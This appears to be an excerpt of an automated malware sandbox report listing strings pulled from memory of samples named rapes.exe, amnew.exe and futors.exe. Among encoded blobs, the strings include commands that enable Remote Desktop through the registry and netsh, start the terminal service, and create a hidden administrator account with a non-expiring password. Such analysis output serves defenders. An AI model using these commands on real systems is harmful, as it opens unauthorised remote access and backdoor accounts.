                                      Source: rapes.exe, 00000002.00000002.1039110891.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: rapes.exeString found in binary or memory: net start termservice
                                      Source: rapes.exe, 00000003.00000002.1046270812.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: net start termservice
                                      Source: rapes.exe, 00000003.00000002.1046270812.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: amnew.exeString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000000.1311776357.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000000.1311776357.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: amnew.exe, 0000000D.00000002.1325500672.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000002.1325500672.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: amnew.exe, 0000000D.00000003.1322682890.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000003.1322682890.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= 
autonet start termservice" /add /y" "net user "" /addnet localgroup "Administrators" "'" SET PasswordExpires=FALSEWMIC USERACCOUNT WHERE "Name = ''" SET Passwordchangeable=FALSEw01--E'' -DestinationPath 'powershell -Command Expand-Archive -Path '%d
                                      Source: futors.exeString found in binary or memory: net start termservice
                                      Source: futors.exe, 0000000E.00000002.1325607178.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                                      Source: futors.exe, 0000000E.00000002.1325607178.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: futors.exe, 0000000E.00000000.1322997240.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
